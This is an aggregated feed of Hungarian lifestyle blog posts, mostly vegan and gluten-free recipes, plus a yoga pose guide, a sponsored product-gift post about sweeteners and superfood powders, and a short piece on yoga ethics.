Húzd be picit az állad és fejtetővel nyújtózz lefelé. - Lélegezz egyenletesen és próbálj a kilégzésekkel egyre mélyebbre menni a pózba - finoman, figyelve a tested jelzéseire. Próbáld legalább 30 - 6 0 másodpercig megtartani a póz. A kitartás alatt figyelj rá, hogy a derekad egyenes maradjon - ha begörbül, akkor feltétlenül hajlított térdekkel végezd ezt a pózt. Ügyelj arra, hogy ne erőltesd a pózt, ne húzd meg magad, ne erőszakkal akarj jobb eredményt elérni. Belégzéssel nyújtsd a lábakat és a sarkakból emeld az ülőcsontokat. Kilégzéssel nyújtózz fejtetővel lefelé, megtartva a hasat és a hátat. Belégzéssel nyújtózz a karokkal felfelé és szegycsonttal a talaj felé, kilégzéssel tartsd a lapockatájékot és távolítsd a kulcscsontokat. Kijövetel a pózból: kezdőként engedd vissza a karokat a keresztcsontra, majd bontsd el a kulcsolást és engedd le a karokat a lábak mellé. Majd lassan csigolyáról, csigolyára gördülj fel. Haladókét megtartott hassal és derékkal, nyújtott karokkal is felegyenesedhetsz, úgy hogy a karokat vissza engeded a keresztcsontodhoz - ezt követően szétbonthatod a kulcsolást. Ne végezd a pózt, ha komolyabb derékfájásod van vagy gerincsérved. Amennyiben rutinos jógás vagy hajlított térddel egyenes derékkal még gerincsérv esetén is gyakorolhatod. Akkor se gyakorlod, ha kezeletlen magasvérnyomással küzdesz. V alamint akkor se kivitelezd a pózt ha a feje den aktuálisan van valamilyen gyulladás - begy u lladt a fogad, arcüreged, etc. A dvikónászana olyankor sem ajánlott, ha valamilyen komolyabb vállproblémád vagy nyaki gerinc problémád van. A jógagyakorlatokat először mindig hozzáértő jógaoktatóval sajátítsd el. J ó gyakorlást kívánok:) szeretettel: Kati
Peanut butter jelly szendvics – mi ez, és hogyan készítsünk hozzá mogyoróvajat házilag, földimogyoróból? – Vegán recept
Az amerikai kultúrában gyakran emlegetik (és eszik) a PB&J-t, azaz a peanut butter jelly sandwichet. Ezt nyomják reggelire, ezt csomagolják a gyereknek uzsonnára, és ha csak úgy megéheznek, nasinak is megteszi. Angolul tudók már kitalálhatták, hogy mogyoróvaj és dzsem vagy lekvár kerül a két szelet kenyér közé, vagy a szelet kenyér tetejére. Elég tömény, a mogyoróvajnak igen magas az olajtartalma, a lekvárok pedig cukrosak, de szerintem még így sem feltétlen haladja meg a zsír- és cukortartalma az átlagos, magyar sajtos-kecsapos szendvicsét, és mivel állati eredetű anyagoktól mentes, azoknak a káros hatását is elkerüljük. Aki a könnyedebb, de tápláló reggeliket kedveli, annak a zabkása recepteket ajánlom. A mogyoróvajas-lekváros szendvics elkészítését nem nagyon kell magyaráznom, de talán a beszerzési helyekről érdemes beszélni. Lekvár vásárlásánál a legfontosabb, hogy olyat vegyünk, ami zselatintól és kárminoktól mentes. A zselatin állati csontokból és melléktermékekből készül, a kármin pedig összezúzott bíbortetvekből. Mogyoróvaj (és földimogyoró) vásárláskor arra figyeljünk, hogy igyekezzünk pálmaolajmentes termékeket választani (ez elég nehéz). A közepes- és nagyáruházakban, kínai vegyesboltokban, bioboltokban és sok más helyen kapható, van smooth és crunchy verziója. A smooth teljesen sima állagú, mint egy mogyorókrém (de nem olyan édes, és nem kakaós, hanem földimogyoró ízű), a crunchyban pedig mogyoródarabok vannak. A kenyérválasztásról hamarosan írok egy következő cikkben. Hogyan készítsünk házilag mogyoróvajat: Hozzávalók: 200 g földimogyoró (lehetőleg sótlan, pálmaolajmentes, pl. Naturfood) 1 kávéskanál só 1 teáskanál cukor (én gyümölcscukrot használok) 1-2 evőkanál kókuszolaj olvasztva (vagy más olaj) A mogyoró felét és a többi összetevőt egy magas falú edénybe tesszük, és botmixerrel elkezdjük eldolgozni. Mikor már krémes, szép lassan adagoljuk hozzá a többi mogyorót, és krémesítsük annyira, amennyire szeretnénk, vagy amennyire a botmixerünk bírja. Tippek: Az olajos magvak megterhelik a botmixert, úgyhogy vigyázzunk, hogy ne melegedjen túl, és egy perc mixelés után pihentessük kicsit. Sózott mogyoróval is dolgozhatunk, a mogyik feléről mossuk le a sót, majd várjuk meg, hogy kicsit megszáradjanak. Utána kóstolgassuk, és ízlés szerint adjunk hozzá sót, ha szükséges. Ha a mogyorónk nincs pirítva, száraz serpenyőben, folyamatosan kevergetve-rázogatva megpiríthatjuk őket az extra íz érdekében. A forró mogyorókkal azonban várjunk, mert megolvaszthatják a műanyag botmixert vagy mixelőedényt. The post Peanut butter jelly szendvics – mi ez, és hogyan készítsünk hozzá mogyoróvajat házilag, földimogyoróból? – Vegán recept appeared first on VegaNinja.
Rakott cukkini kölessel és vegán “sajtkrémmel”
Vannak azok a napok, amikor nincs itthon friss alapanyag, mégis valami egészségeset és táplálót szeretnék csinálni. Ilyenkor jönnek jól a fagyasztott zöldségek, a gabonák és a tartós zöldségek, mint a hagyma, a krumpli és a répa. Vegán sajtkrém hozzávalók: 1 közepes fej vöröshagyma 3 nagyobb répa 2 nagyobb krumpli 2 evőkanál kókuszolaj 3 evőkanál sörélesztőpehely (gluténmentes változata is van) 1 kicsi gerezd fokhagyma 1 teáskanál füstölt pirospaprika (sima paprika is jó) 2 teáskanál natúr ételízesítő só bors fél citrom kifacsart leve A hagymát, répát és krumplit megpucoljuk, kisebb darabokra vágjuk (úgy gyorsabban megfő). Egy lábasba tesszük annyi vízzel, amennyi éppen ellepi, sóval, borssal és ételízesítővel, és a fokhagymanyomóval kinyomott fokhagymával megfőzzük, közepes lángon, fedő alatt. Amikor kész, a főzővíz kb. felét leöntjük róla egy tálba, és félretesszük, mert a végén még kellhet. Hozzáadjuk a kókuszolajat, a sörélesztőpelyhet, a citrom levét és a füstölt paprikát (ha sima pirospaprikát használunk, akkor a füstölt íz nyilván nem lesz jelen, de úgy is finom). Botmixer segítségével krémesítjük, és ha túl szilárd, a főzővízzel, és/vagy némi extra kókuszolajjal hígíthatjuk. Ebben az esetben jobb, ha kicsit szilárdabb és egy kicsit darabosabb, de ha pl. mártogatós szósznak készítjük valamikor máskor, akkor lehet hígabb, és sokkal simább is. Hozzávalók a fokhagymás cukkinihez: fél kg fagyasztott vagy friss cukkini karikázva fél doboz növényi tejszín (pl. zabtejszín) 2 dl édesítetlen növényi tej (pl. zabtej) 2 evőkanál zabliszt (kukoricakeményítő is megfelel) 2 gerezd fokhagyma só A cukkinit némi sóval és pici vízzel feltesszük párolódni kis lángon, lefedve. Időnként kevergessük meg. 5 perc után nyomjuk rá a fokhagymát a nyomóval, és keverjük el. Főzzük tovább fedő nélkül. Mikor már áttetszőek a szeletek, öntsük rá a növényi tejszínt, sózzuk meg. A zablisztet (vagy keményítőt) tegyük bele egy kisebb, jól záródó tárolóba, pl. befőttes üvegbe, és öntsük hozzá a zabtejet, majd rázzuk össsze alaposan. Adjuk hozzá a cukkinihez, és keverjük el. Gyakran kevergessük, mert hamar besűrűsödik, ekkor elkészült a cukkinis rétegünk. A cukkini gyorsan megfő, de nem szükséges teljesen puhára főznünk, mivel a sütőben még tovább fog puhulni. Hozzávalók a köles réteghez: 20 dkg (kb. 4 dl) köles kb. 6 dl víz só fél citrom leve kb. 2dl zabtej A kölest általában háromszoros mennyiségű folyadékban szoktuk megfőzni, de mivel most nem kell teljesen puhára főzni, mivel sütőben fog megsülni, így a kb. 4 dl kölest a vízzel és a zabtejjel (más növényi tej is jó) összesen 8 dl folyadékban főzzük félpuhára. Még főzés előtt sózzuk is, és ha szeretjük a kaprot, mehet bele az is. Ha elfőtt, levesszük a tűzről, és mikor már picit kihűlt, hozzáadjuk a citromlevet. Hozzávalók a többi réteghez: 2 fej hagyma 1 evőkanál kókuszolaj só 2 érett paradicsom 2 evőkanál napraforgómag pár szelet növényi sajt Rétegezés: Alulra megy a párolt hagyma, rá a köles réteg, arra pedig a cukkinis-tejszínes réteg. Erre a textúra miatt rászórjuk a napraforgómagot (meg is piríthatjuk előtte, de nem fontos), és erre kerül vastagon a sajtszósz. A tetejére rákarikázzuk a paradicsomokat, és a növényi sajt szeleteket. 200-250 fokon (nagy lángon) 20-25 perc alatt készre sütjük. A képen látható csicseriborsó ropogós receptjét itt találod. The post Rakott cukkini kölessel és vegán “sajtkrémmel” appeared first on VegaNinja.
Csomagom érkezett!
2019. január 8. Mindennapi ételeink
Noha a blog most őszi és téli álmot alszik (erről majd egy külön posztban írok), születésnapomra különleges csomagot hozott a postás! Feladója Tóth Gábor, élelmiszeripari mérnök és táplálkozáskutató, aki évek óta jó ismerősünk. Sokatoknak tévéből, rádióból lehet ismerős: évek óta Class Fm, majd a Rádió 1 állandó szakértő vendége, de az Rtl Klub Tv2, Duna Tv szerkesztői is sokszor kérik ki véleményét, másoknak a könyvei ismerősek. És talán sokan fogyasztjátok is a termékeit, anélkül,hogy tudnátok,ő áll a fejlesztések mögött. Több weboldalon is elérhetők, pl e-mentes.com , blnce.hu. A csomagban egyrészt különleges édesítőszerek sorakoztak, melyek eritrit és stevia keverékei. A Smart Sweet édesítő e ritrit és mellékízmentes, nagy tisztaságú stevia egyedileg beállított keveréke, 4-szeres édesítő erővel. Én is itthon ezt a kettő cukor-alternatívát szoktam magunknak összekeverni,1 éves Gergő fiunknak még nem adom, neki még a banán,alma,datolya az édesítőszer,illetve most már a mézzel is próbálkozom nála. Másfelől két különleges terméket kaptunk, amiknek elmondhatatlanul örülök. Egyrészt egy Lady, másfelől egy Relax keverék. Igazi superfood-ok, amire most igazán szükségem van, hiszen több mint egy éve igény szerint szoptatom Gergő fiunkat (ez kb. napközben 1 órát, éjszaka 20 percenkénti szopit jelent :-D) , illetve 8-9 hónapja küzdünk az alvásával, már több helyen is jártunk, de sajnos nem találtunk megoldást, 20-30 percenként ébred és cicivel, simogatással alszik vissza. Így nem a kipihentség és szupererőnlét jellemez :-). Tehát el is kezdtem a Lady fogyasztását, ami csíráztatott biomagvak finomra őrölt keveréke, gránátalmával, lime-mal és bifidobaktériumokkal. A relax keverék csíráztatott barna rizs liszt. Organikus kötésű szelénben gazdag, organikus cink és réz forrású immunerősítő élelmiszer. A termék támogatja az immunrendszer normális működését és az anti-oxidációs folyamatokat, az esti időszakban szervezet védekezését a napi stresszek ellen . Segíti a haj és köröm normális állapotának, valamint a normális pajzsmirigy funkció fenntartását. Támogatja a gondolkodó képesség, a vérszérum tesztoszteron szintjének, valamint a szervezet sav-bázis egyensúlyának fenntartását. Tehát ezt is hamarosan elfogyasztom, hiszen Fanni is sokat, sokáig szopizott, Gergő is tervezem, hogy sokáig részesüljön ebből a kiváltságból. Cserébe természetesen a hajam elkezdett hullani és fáradékonyabb vagyok. Talán segítség lesz ebben is. Bár az is lehet, a relax keveréket a gyerekek eszik majd ;) Szívesen írok majd tapasztalatod. Jó szívvel ajánlom tehát, keressétek fel Gábor weblapjait, olvassátok a könyveit, és fogyasszátok a termékeiket. Karácsony után is jól jönnek az ilyen jellegű ajándékok ;-)
Vegán piskóta recept
Amikor meglátogatom a szüleimet, anyukám ezzel a piskótával szokott várni. Ez a változat nem olyan szivacsos és könnyű, mint a hagyományos verzió, de nekem ez jobban is ízlik. Azóta már kifejlesztette a gluténmentes verziót, abban a liszteket Szafi édessütemény lisztjére cserélte ki. Meggyel és dióval készítve is nagyon finom! Hozzávalók: 17 dkg fehér liszt 8 dkg teljes kiörlésű tönkölyliszt 1 csomag sütőpor 1 mokkás kanál szódabikarbóna 8 evőkanál olaj 2,5 dl növényi tej 10 dkg gyümölcscukor 1 db citrom leve A száraz összetevőket összekeverjük, majd a folyékony hozzávalókkal együtt összedolgozzuk. Sütőpapirral bélelt tepsiben nagy lángon készre sütjük. Meggyet, más gyümölcsöt, étcsokidarabokat, olajos magokat keverhetünk bele. The post Vegán piskóta recept appeared first on VegaNinja.
Gluténmentes vaníliás keksz
2018. december 22. Élj harmóniában
Az én egyik kedvenc műfajom a keksz. Kislány korom óta imádom a ropogós sós és édes kekszeket. Nagyon szeretek a konyhában újabb keksz recepteket kikísérletezni - ez is ilyen fejlesztett recept. A cél az volt, hogy egy nagyon egyszerű gluténmentes, tojásmentes kekszet készítsek. Jómagam szeretem a hajdinát, mert nem csak ízletes, de nagyon egészséges is. S zívesen készítek hajdinalisztes ételeket, mert nagyon jó süteményekhez. Ha gluténemntes ételekről van szó, nagyon nem kedvelem a mindenféle lisztkeverékeket, gyárilag előre akár adalékanyagokkal elkészített vegyes csomagokat - bevallom én még soha nem vettem ilyesmit. Érdemes otthon többféle gluténmentes lisztet tartanod (hajdina, rizs, kukorica, amaránt, kókusz, quinoa, etc) sütőport, esetleg kukoricakeményítőt és azokból készíteni a finomságokat:) Gluténmentes vaníliás keksz Hozzávalók 10 dkg hajdinaliszt 30 g nádcukor 30 g vaj 1 csipet sütőpor vanília egy kevés tejföl Vegyszermentes (bio) alapanyagokat használj A száraz hozzávalókat keverd össze egy tálba, majd morzsold el a vajat és tegyél hozzá tejfölt. Gyúrj linzerszerű tésztát - annyi tejfölt tegyél bele, hogy jól gyúrható tésztát kapj. A tésztát nyújtsd ki és szaggass belőle kekszformákat. A kekszeket helyezd sütőpapírral bélelt tepsire és 180-200 C fokon kb. 10 percig süsd, amíg picit aranybarna nem lesz. Amennyiben nagyon édesszájú a csapat, növeld meg picit a cukor mennyiségét:) Jó étvágyat hozzá:) szeretettel KAti
Csőben sült csicsóka (vegán)
Mindezidáig csak próbáltam szeretni a csicsókát, mert tudtam, az egészség szempontjából értékes gumó, mivel magnéziumot, kalciumot, káliumot, foszfort, B1-, B2-, és C-vitamint tartalmaz. Ásványianyag-tartalmának köszönhetően segít megelőzni a szív- és érrendszeri megbetegedések, a mellrák, az elhízás és a cukorbetegség kialakulásának kockázatát. Legnagyobb részben inulint tartalmaz, mely támogatja a máj, a lép és a hasnyálmirigy működését. Mivel feldolgozásához a szervezetnek nem kell inzulin termelnie, így a cukorbetegek egyik hasznos és kedvelt alapanyaga lehet. Az inulinnak rákellenes hatása is ismert, ezért fogyasztása mindenkinek ajánlott. Rosttartalma gátolja a hizlaló tápanyagok felszívódását a szervezetbe, ezért diéta idejére is ajánlott. (forrás Hazipatika.com)
Hiába ilyen értékes, ha legtöbbször puffadás követte a csicsóka fogyasztását. Pedig ettem nyersen, salátába keverve, készítettem belőle krémlevest is. Mostanáig tehát inkább csak ismerkedtem vele. Ez az étel azonban megváltoztatta a csicsókához való viszonyomat, mert naggggyon finom lett és nem puffadtunk tőle.
A recept
Hozzávalók:
- 1 kg csicsóka
- kurkuma
- só
- 4 dl növényi tej
- fokhagyma (opcionális)
- petrezselyem
- 1 ek sárgaborsó liszt
- 2 ek étkezési keményítő
- kókusz zsír
- vegán sajt (opcionális, én most nélküle készítettem)
- ételízesítő
Elkészítés:
A csicsókát vagy alaposan átdörzsöljük dörzsölővel, vagy megpucoljuk, karikákra vágjuk és kevés sós vízzel, fedő alatt megpároljuk. Egy nagyobb bögrében összekeverjük a sárgaborsó lisztet, és a keményítőt, majd kb. a növényi tej felével csomómentesre keverjük és lassan adagoljuk hozzá maradék növényi tejet, egy-két csipetnyi kurkumát és kb. 1 teáskanálnyi ételízesítőt.
Egy tűzálló tálat kókusz zsírral kikenünk majd a megfőtt csicsókakarikákat szépen elrendezzük. Rálocsoljuk a lisztes-keményítős növényi tejet, ha szeretnénk fokhagyma darabokat, karikákat szórunk a tetejére, majd mehet a sütőbe, ahol 180 fokon aranybarnára sütjük. Ha szeretnénk, reszelt sajtot szórhatunk a tetejére a sütés utolsó 5 percébe. Tálalás előtt apróra vágott petrezselyemmel lágyan megszórjuk.
Ünnepi fatörzs (vegán)
Kimondottan ünnepi édesség, amelynek eredeti neve "Yule log". A log szót először számítástechnikában ismertem meg (még IRC-es időszakomban), ez esetben azonban egészen mást jelent: fatörzs, fahasáb, farönk. A yule szó hozza leginkább közelebb az ünnepihez ezt a desszertet, mivel ez a szó a Nap visszatérésének ünnepét jelöli. Az éjszakák most, decemberben a leghosszabbak. A hosszú sötét téli éjszakákon mindent elrejt a jég, a hó. A napfordulótól kezdve azonban egyre hosszabbodnak a nappalok. A fény újjászületik, napról napra er?södik. A fény és a sötétség közti örök harcban ismét a világosság kerekedik fölül. Az északi népeknél a Yuletide, tizenkét éjszakán át tart (dec. 20. - december 31.). Ez az időszak reperezentálja az óév elmúlását, valamint az új esztend?re való készülődést.
Mégis miért fatörzs a neve, honnan ered a szokás, hogy karácsony tájékán fatörzset sütnek (napjainkban már inkább csak vesznek) a háziasszonyok? A szokás a középkorra vezethető vissza, az északi népeknél elterjedt hagyomány "hozza" karácsony környékén tányérunkra a fatörzs szeletet. A "yule log" eredetileg egy gondosan kiválasztott egész, nagy darab fa volt, amit ünnepi szertartás közepette hoztak a házba. A legnagyobb végét a tűz szívébe helyezték. A fa további részeivel táplálták a tüzet a karácsony 12 napján keresztül. Csak tiszta kézzel szabadott meggyújtani. Ünnepként élték meg ezt a hagyományt, mert a tűz nem csak meleget, de világosságot is adott a házban lakók számára. Ez az ünnepi tradició első napján a "Tizenkét éjszaka" nevü süteményt fogyasztották. Ahogy a modernizáció által a fűtési lehetőségek is korszerűsödtek, a teljes, nagy fából már csak az ünnepi asztalt díszítő fatörzs maradt meg napjainkra.
A piskótatekercs receptje
Hozzávalók:
- 17 dkg fehér liszt
- 8 dkg teljes kiőrlésű liszt
- 3-4 evőkanál nyírfacukor
- 2-3 evőkanál kakaópor (vagy karobpor)
- 14 evőkanál növényi tej
- 2 evőkanál étolaj
- 1 kisebb citrom kifacsart leve
- 1/2 teáskanál szódabikarbóna
Elkészítés:
Fogunk egy tálat, összekeverjük benne először a száraz hozzávalókat, majd hozzákanalazzuk a növényi tejet és étolajat és hozzáadjuk a citrom levét. Csomómentesre keverjük majd egy sütőpapírral bélelt tepsibe öntjük. Előmelegített sütőben kb. 20 percig sütjük. Tűpróbával ellenőrizzük, ha beleszúrjuk a piskóta közepébe, és nem ragad rá, megsült a piskótánk. Ezt követően kivesszük és egy enyhén nedves konyharuhával (ne csöpögjön belőle a víz, éppe csak picit legyen nedves), felcsavarjuk a tésztát. A konyharuhát a tiszta pultra tesszük, arra fektetjük a kisült tésztát (nem baj, ha a sütőpapír rajta van) és így pihentetjük, amig ki nem hül. Ne nyomogassuk, mert a tészta megtörhet.
Ha kihűlt, óvatosan leszedjük róla a papírt és először belül töltjük meg az avokádós csokikrémmel, majd felcsavarjuk és kívülről is megkenjük vele. A legvégén a villát végighúzkodva mintázatot teszünk a rákent csokikrémre és így pihentetjük a hütőben pár órát vagy egy éjszakát. A tetejét tetszés szerint dekoráljuk, én kókusz csipszet szórtam rá.
A csokikrém receptje
Hozzávalók:
- 2 db érett nagy avokádó héj nélkül
- 7 dkg kakaópor (kevesebb karobbal is készíthető!)
- 6 dkg kókuszolaj
- 10 dkg édesítőszer, pl: nádcukor, nyírfacukor, áztatott datolyából szósz, stb, ki mit használ
- 1 csipet tengeri só
- 1/2 vanília kikapart belseje vagy 1 teáskanál vanília esszencia
Elkészítés:
Vegyük elő a turmixgépet és a fentieket mindet, ebben a sorrendben tegyük bele. Indítsuk el, és hamarosan látni fogjuk hogy milyen fantasztikus krémet kapunk végeredményne k. Lehet, néha egy átkeveréssel segíteni kell a turmix gép munkáját. Olyan krém lesz, mint a csokitorták csokikrémje. Ha lágyabb krémet szeretnénk, pár csepp vízzel vagy növényi tejjel krémesebb lesz. A kész krémet kb. 1/2 órára érdemes hűtőbe tenni, megdermedés után jobban használható.
Tőzsdére készül Leonardo DiCaprio vegán burgeres cége
A Beyond Meat nevű vegán burgeres cég azt tervezi, hogy tőzsdén keresztül von be forrásokat a további terjeszkedéshez - vette észre a Portfolio.hu.
Magyaros sütőtök-krémleves
Karácsonyi akció részleteiért KATT IDE FEKETE PÉNTEK akció: november 25-éig 15% kedvezmény bármelyik főzőtanfolyam árából Esküszöm, már vagy tizenötféle sütőtök-krémlevest kipróbáltam. Volt keleties, volt édeskés, volt krumplis, volt sokzöldséges, volt afrikai, szóval, mindenféle. De magyaros miért nem? Létezik egyáltalán magyaros sütőtök-krémleves? Na, ennek jártam utána ma. Nem tudom, hogy én találtam-e ki (valószínűleg nem, haha), de ha csak megtaláltam, már annak is nagyon örülök! ;) Hozzávalók két adaghoz - 150 g sütőben megsült tök (már sütve mérve) - negyed fej vöröshagyma - 1 gerezd fokhagyma - 200 ml növényi tej (minél semlegesebb ízű, javaslom a cukrozatlan szójatejet vagy rizstejet) - 2 mk édes pirospaprika - fél mk csípős pirospaprika - 1 késhegynyi őrölt fahéj - fél mk füstaroma ( tudod, a teljesen természetes, folyékony verzió) - só ízlés szerint - Egy evőkanál olajon pirítsd meg a vékonyra szeletelt vöröshagymát, majd amikor majdnem kész, mellette a felkarikázott fokhagymát is. Zárd el alatta a tüzet, majd szórd rá a pirospaprikákat. Gyönyörű színe lesz, és – hű, hogy szállnak azok az illatok! :) Jól keverd össze. - A botturmix poharába kapard bele a sütőtököt, hintsd rá a pici fahéjat, locsold meg füstaromával és kanalazd bele a pirított hagymákat. - Öntsd fel a tejjel, lazítsd még ugyanannyi vízzel, sózd meg, és turmixold krémesre. - Pirított hagymaszeletekkel tálald. Jó étvágyat! Elkészítési idő (megsült tökből): 5 perc Ez egy vegán recept volt. :) Hasonló recepteket ITT találsz még. Ha itt feliratkozol, a legújabbakat mindig frissen kapod majd a postaládádba. :) Nézd meg a legújabb Kertkonyha főzőtanfolyamokat! Kezdő Vegán Vegán MUST HAVE - a kötelező alapcsomag Növényi Tejek és Tejtermékek I Növényi Tejtermékek II A Mindennapi Superfood Kezdő Vegán Angol nyelven FEKETE PÉNTEK akció: november 25-éig 15% kedvezmény bármelyik főzőtanfolyam árából Karácsonyi akció részleteiért KATT IDE The post Magyaros sütőtök-krémleves appeared first on Kertkonyha.
Bhagavad Gíta idézetek - ragaszkodás és ellenszenv
2018. november 17. Élj harmóniában
Az elmében a legtöbb gondot a ragaszkodás és az irtózás okozza a mai kor emberének. Az ilyen gondolatok belső feszültséget, aggodalmakat és konfliktusokat okoznak, melyek további stresszforrást jelentenek.. Patandzsali A Jógaszútrákban leírja a Yama és Niyama elveket, melyeket bevezetve az életedbe megtapasztalatlanod, hogy egyre kevésbé ragaszkodsz és irtózol, és egyre inkább elfogadóvá tudsz válni a világgal szemben. Yama-k: *Erőszakmentesség* *Igazmondás* *Becsületesség* *Megfelelő szexuális kontroll* *Nagylelkűség, birtoklási vágytól való mentesség* Niyama-k *Tisztaság* *Elégedettség* *Lemondás, mértékletesség, önkontroll* *Önképzés, spirituális tudás megszerzése* * Hit, önátadás Istennek* A jógaszútrákban Patandzsali ad még néhány tanácsot ahhoz, hogy a negatív érzelmeinket pozitív irányba tudd terelni: - Érezz szeretetet azok felé, akik jól élnek. Mások örömének úgy örülj, mintha a sajátod lenne. Ha jó szívű vagy és barátságos másokkal, az meg tud védeni az irigységtől. - Legyél együttérző, mások szenvedését úgy próbáld enyhíteni, mintha a sajátod lenne. Ez megvéd attól, hogy másokat bánts és gyűlölködj. Valamint megvéd attól a fajta büszkeségtől is, ami abból az önhittségből jön, hogy Te jobb helyzetben vagy mint mások. - Örülj annak, ha másokban erényes, jó hozzáállást látsz és ezt soha ne kicsinyeld le. Ismerd el mások jó tulajdonságait, eredményeit, erényeit és inkább tanulj tőlük. Ha így teszel, akkor Te magad is fejlődni fogsz és egyre inkább hajlamos leszel jobb emberré válni, jó dolgokat tenni. - A gonoszok felé légy semleges, ne gyűlölködj, ne ítéld el őket. Onnantól, hogy elkezdesz irtózni, gyűlölködni, ítélkezni, ugyanazt a negatív minőséget képviseled Te magad is, mint amitől eredetileg távol szerettél volna maradni.... Amennyiben nem ítélkezel és nem gyűlölködsz, akkor távolabb kerülsz a gonosz dolgoktól és az intoleranciától. Ha így teszel egyre kevesebb gonoszság lesz benned és egyre elfogadóbbá tudsz válni.
Gyors, gluténmentes, tejmentes, karobos puliszkasüti
2018. november 1. Élj harmóniában
Tegnap a Gyertyafényes Halloween Jógára készítettem ezt az édességet. Lévén jött olyan is a jógagyakorlásra, akiről tudtam, hogy gluténmentesen táplálkozik, ezért szem előtt tartva Judit táplálkozását választottam olyan alapanyagot, hogy ő is tudjon enni belőle:) A kukoricadarát, (puliszka, polenta) szeretem, mert gyorsan elkészül, tápláló és különböző élelmiszer allergia, érzékenység esetén is fogyasztható. Korábban jó néhány receptet is tettem már ki pl. sós puliszkás receptet a blogra, egy párolt zöldséges receptet itt olvashatsz, és itt találsz egy polenta pizza receptet. Ezt az édes puliszkasüti alapreceptet gyakran szoktam készíteni, de a kókusztejszínes változat most új kísérlet volt:) A karob a kakaó egészségesebb változata. Ha nincs otthon karob nyugodtan helyettesítheted kakaóval is. Hozzávalók 1 csésze kukoricadara 4 csésze víz 1 csésze kókuszreszelék 4 púpos ek. karob 1/2 csésze teljes értékű nádcukor (ízlés szerint változtatható mennyiség) vanília 1 doboz kókusztejszín Vegyszermentes (bio) alapanyagokat használj! A vizet egy nagy edénybe forrald fel. Tedd hozzá a kókuszt, vaníliát, karobot. M ajd vedd kis lángra és keverd bele a kukoricadarát. Keverd folyamatosan - habverőt is használhatsz az elején, azzal könnyebb csomómentesre eldolgozni a kukoricadarát.Amikor már csomómentes keverd hozzá a kókusztejszínt. Kb. 5 perc után már fakanállal is könnyedén tudod keverni. Addig főzd amíg meg nem fő, szépen elválik majd az edény falától. Egy tepsibe öntsd bele a masszát. Várd meg amíg kihűl és utána szépen szeleted fel. Én mielőtt kihűlne kókusszal vastagon megszórom a tetejét, hogy szép legyen. Jó étvágyat kívánok:) szeretettel Kati
Csalánleves – vegán recept
A csalánt csak kellemetlen, útszéli gyomként, vagy gyógyteaként ismerik sokan, pedig ízletes levest lehet belőle főzni. Körültekintően szedve többnyire megúszhatjuk a csípését. Zacskót húzva a kezünkre egy másik zacskóba szüretelhetjük a fiatalabb, szár végi leveleket, levélpárokat, majd az alábbi módszerrel teljesen elvehetjük a csípősségét. Nézzük, mi a titok! A csalánt – ahogy a többi gyógynövényt sem – ne út mellett szedjük, mert a szmog rátelepszik és beszívódik a levelekbe. Zsenge hajtásokat válasszunk. Hazaérve hűtőben eláll egy napig zacskóban, de azért másnap érdemes elkészíteni. Így vehetjük el a csípősségét: a nejlonzacskót, amiben a csalán van, tegyük bele még egy réteg nejlonzacsiba, és engedjünk bele annyi vizet, hogy ellepje a leveleket, és alaposan dörgöljük, masszírozzuk át a leveleket a vízben, zacskón keresztül. Az így keletkező csalános víz állítólag levéltetű elleni permetezésre használható. Ismételjük meg 2-3-szor a dörzsöléses mosást. Ezzel kimosódik az irritáló anyag a levélszőröcskékből. Ez után letépkedhetjük szabad kézzel a leveleket a szárakról, és feltehetjük főzni. Csalánleves hozzávalók: 3 nagy maréknyi csalánlevél 1 nagy gerezd fokhagyma 1 evőkanál natúr ételízesítő (elhagyható) 1 dl növényi tej (édesítetlen) 1 evőkanál apró szemű zabpehely, vagy zabliszt só ízlés szerint Főzzük meg a csalánleveleket sóval, összetört fokhagymával és természetes ételízesítővel ízesített vízben. Egy deciliter édesítetlen növényi tejet rázzunk/keverjünk össze zabpehelyliszttel (vagy zabpehellyel). Amikor a csalán kb. 20 perc alatt puhára főtt, adjuk a zabos-növényi tejes keveréket a leveshez, és botmixer segítségével aprítsuk ízlés szerint. Én szeretem, ha vannak nagyobb levéldarabok még a végeredményben, de teljesen simára is apríthatjuk. Szezámmaggal, tökmaggal megszórva, vagy növényi tejszínnel meglocsolva tálalhatjuk. The post Csalánleves – vegán recept appeared first on VegaNinja.
Sütőtök krémleves ropogosó zsályával (laktózmentes, gluténmentes, vegán)
2018. október 14. Zizi kalandjai
Már második alkalommal készítettük ezt a sütőtök krémlevest Zizi konyhája kurzuson és mindenki imádta. Krémes, édeskés és sós, nincs benne semmilyen tejszín (mármint növényi tejszín), mégis olyan, mintha lenne. Az eredeti receptet nagyon-nagyon régen Mautner Zsófinál találtam, azt vegánosítottam és a mai kurzuson feldobtuk az i-re a pontot ropogós zsályalevelekkel. Mennyei volt. A krémes... Source
Szilvakrémes sütemény (nyers, vegán)
A nyarat a dinnye miatt szeretem, a nyár végét a nagy barackok miatt, az őszt pedig a szilva miatt. Emlékszem, Magyarországon is még karácsony előtt néhány héttel is találtam magyar szilvát piacon akkor, amikor enyhe volt a tél kezdet. Őrizgettem a balkonon, letakarva karácsonyig, hogy aztán jó kis szilvakrémlevest készítsek gesztenyehabbal. Ehhez a sütihez is piacon szereztem a szilvát, igaz, egészen más tipusú piacon. Itt úgy hívják, hogy carboot-sale. Az emberek az autójuk csomagtartójából árulnak mindenféle dolgot, ami már nem kell az otthonukban. Ezeken az alkalmakon van egyetlen egy zöldség-gyümölcs árus. Nos, tőle veszem a gyümölcsöt április végétől október végéig. Mivel ezek a carboot sale alkalmak kültéri helyszínen vannak (legalább is, a mi városunkban), ezért sajnos télen nem tudok tőlük vásárolni. Szeretem a mienket, mert nagyobb tételben is tudok venni gyümölcsöt, zöldséget, úgy pedig olcsóbb. Ehhez a szilvához is úgy jutottam, hogy egy ládával vettünk. Általában spanyolból érkezik az árú, legalább is a dobozokon általában rajta van a származás. Az eper és alma jön leginkább brit földről. Ugyanakkor egyfajta lutri, hogy épp milyen portékájuk van.
No, minden esetre most nem főztem a szilvából levest, meghagytam nyers süteménynek. Két alkalomból is. Egyik este néhány barátunk jött hozzánk, rá 1-2 napra pedig egy gluténmentesen étkező barátnőmnek adtam minitortát szülinapjára. Mindkét alkalommal jól bevált volt. Tehát tortát, süteményt is lehet belőle készíteni, attól függően, milyen alakba tesszük a sütemény alapját és rá a krémeket.
